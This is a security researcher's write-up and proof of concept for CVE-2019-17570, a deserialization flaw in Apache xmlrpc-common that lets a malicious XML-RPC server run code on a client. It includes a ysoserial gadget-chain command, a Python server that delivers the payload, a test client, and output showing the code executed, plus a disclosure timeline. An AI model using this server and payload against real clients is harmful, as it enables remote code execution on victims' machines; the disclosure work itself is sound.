5l1v3r1 / xmlrpc-common-deserialization

CVE-2019-17570 details and proof of concept

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

xmlrpc-common deserialization vulnerability

This note is a technical note to detail the root cause and the associated exploit. You can find the initial disclosure here. The associated CVE is CVE-2019-17570.


xmlrpc-common forms a shared code base between xmlrpc-client and xmlrpc-server. A deserialization vulnerability has been identified in org.apache.xmlrpc.parser.XmlRpcResponseParser.addResult(Object) method. It enables an attacker controlled xmlrpc server to send a malicious xmlrpc reply, that will trigger remote code execution in the xmlrpc client.

The deserialization is triggered by the use of xmlrpc faults, which may contain a faultCause. The content of this node is processed as a byte array, later deserialized to a Java object using readObject():

protected void addResult(Object pResult) throws SAXException {
  if (isSuccess) {
  } else {
    Map map = (Map) pResult;
    Integer faultCode = (Integer) map.get("faultCode");
    if (faultCode == null) {
      throw new SAXParseException("Missing faultCode", getDocumentLocator());
    try {
      errorCode = faultCode.intValue();
    } catch (NumberFormatException e) {
      throw new SAXParseException("Invalid faultCode: " + faultCode,
    errorMessage = (String) map.get("faultString");
    Object exception = map.get("faultCause");
    if (exception != null) {
      try {
        byte[] bytes = (byte[]) exception;
        ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
        ObjectInputStream ois = new ObjectInputStream(bais);
        errorCause = (Throwable) ois.readObject();
      } catch (Throwable t) {
        // Ignore me

The vulnerability is different from CVE-2016-5003, which exploits ex:serialized type to trigger deserialization. This new vulnerability affects xmlrpc-common even in its default configuration, with extension disabled.

Exploitation technique

While the vulnerability is in xmlrpc-common, exploitation requires the use of a gadgets chain to gain remote code execution. The gadgets chain depends on the classes available in the classpath. For demonstation purposes, our proof-of-concept has added Apache commons-collections-3.2.1 in the classpath, and gadgets chain has been generated using ysoserial.

CVSSv3 base score: 9.8



An attacker may execute arbitrary code in the context of an xmlrpc client using xmlrpc-common vulnerable versions.

Proof of concept

Our proof of concept employs a purposely written xmlrpc test client, and an attacker controlled xmlrpc server.

xmlrpc server

The main purpose of this server is to deliver the serialized payload to the vulnerable client. The serialized payload has been created using:

$ java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsCollections5 "ping www.google.com" | base64

The server itself is rather simple, and mainly consists in:

def create_fault_deser(payload):
  return b'''<?xml version="1.0" encoding="UTF-8"?>
          <value><string>You have been pwned</string></value>
''' % (payload)

class Handler(http.server.SimpleHTTPRequestHandler):
  def do_POST(self):
    self.send_header('Content-Type', 'text/xml')


httpd = socketserver.TCPServer(('', 8888), Handler)

The PING_COMMONS_COLLECTIONS variable used above is set to the output of the ysoserial command.

Test xmlrpc client

Our test client source is:

package poc.xmlrpcdeser;

import java.net.MalformedURLException;
import java.net.URL;
import java.util.HashMap;
import java.util.Hashtable;
import org.apache.xmlrpc.XmlRpcException;
import org.apache.xmlrpc.client.XmlRpcClient;
import org.apache.xmlrpc.client.XmlRpcClientConfigImpl;

public class VulnerableClient {
    public static void main(String[] args) throws MalformedURLException, XmlRpcException {
        String domainName = "";

        String serverurl = domainName + "/RPC2";
        XmlRpcClientConfigImpl config = new XmlRpcClientConfigImpl();
        config.setServerURL(new URL(serverurl));
        XmlRpcClient client = new XmlRpcClient();
        Object[] params = new Object[]{"test", "'tell me you are alive' 1337"};
        Object result = (Object) client.execute("xmlrpc-api", params);

Once compile using make, trigger the code execution using:

$ java -jar target/VulnerableClient-1.0-SNAPSHOT-jar-with-dependencies.jar


The malicious payload is delivered to the innocent victim:

$ ./xmlrpc-server.py - - [redacted] "POST /RPC2 HTTP/1.1" 200 -

Our test client fails:

Exception in thread "main" org.apache.xmlrpc.XmlRpcException: You have been pwned
	at org.apache.xmlrpc.client.XmlRpcStreamTransport.readResponse(XmlRpcStreamTransport.java:205)
	at org.apache.xmlrpc.client.XmlRpcStreamTransport.sendRequest(XmlRpcStreamTransport.java:156)
	at org.apache.xmlrpc.client.XmlRpcHttpTransport.sendRequest(XmlRpcHttpTransport.java:143)
	at org.apache.xmlrpc.client.XmlRpcSunHttpTransport.sendRequest(XmlRpcSunHttpTransport.java:69)
	at org.apache.xmlrpc.client.XmlRpcClientWorker.execute(XmlRpcClientWorker.java:56)
	at org.apache.xmlrpc.client.XmlRpcClient.execute(XmlRpcClient.java:167)
	at org.apache.xmlrpc.client.XmlRpcClient.execute(XmlRpcClient.java:137)
	at org.apache.xmlrpc.client.XmlRpcClient.execute(XmlRpcClient.java:126)
	at poc.xmlrpcdeser.VulnerableClient.main(VulnerableClient.java:21)
Caused by: BadAttributeValueException: foo=1
	at ysoserial.payloads.CommonsCollections5.getObject(CommonsCollections5.java:83)
	at ysoserial.payloads.CommonsCollections5.getObject(CommonsCollections5.java:53)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by:
BadAttributeValueException: foo=1
	at ysoserial.payloads.CommonsCollections5.getObject(CommonsCollections5.java:83)
	at ysoserial.payloads.CommonsCollections5.getObject(CommonsCollections5.java:53)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)

But the payload ping www.google.com is executed:

    1   0.000000 →    TCP 64 49378 → 8888 [SYN]
    3   0.000084 →    TCP 64 8888 → 49378 [SYN, ACK]
    5   0.000092 →    TCP 52 49378 → 8888 [ACK]
   11   0.001955 →    HTTP/XML 259 POST /RPC2 HTTP/1.1
   25   0.002905 →    HTTP/XML 52 HTTP/1.0 200 OK
   29   0.133997 → ICMP 84 Echo (ping) request  id=0x1528, seq=0/0, ttl=64
   34   0.149668 → ICMP 84 Echo (ping) reply    id=0x1528, seq=0/0, ttl=51 (request in 29)
   35   1.139284 → ICMP 84 Echo (ping) request  id=0x1528, seq=1/256, ttl=64
   36   1.153082 → ICMP 84 Echo (ping) reply    id=0x1528, seq=1/256, ttl=51 (request in 35)

Please note tshark output has been redacted not to display useless packets.


  • 2019-11-19: Apache informed via email
  • 2019-11-19: Apache XML-RPC is no longer actively maintained
  • 2019-11-21: Red Hat informed via email
  • 2019-11-22: Vulnerability reaffected to Apache project
  • 2020-01-06: Distro OSS security informed via email
  • 2020-01-16: Vulnerability published to OSS security mailing list
  • 2020-01-24: Vulnerability details and proof of concept published on github.com


  • Guillaume TEISSIER (Orange)
  • Orange group

Affected versions

xmlrpc-common forms the base of xmlrpc, and only a few artifacts reference it. But taking a look at the users of xmlrpc client, we find 124 artifacts that embed xmlrpc-common transitively.

The vulnerability affects at least the following versions:

The following versions are immune to this vulnerability, as they do not perform the lookup of faultCause in the received response:


CVE-2019-17570 details and proof of concept

License:MIT License


Language:Python 80.8%Language:Java 18.4%Language:Makefile 0.8%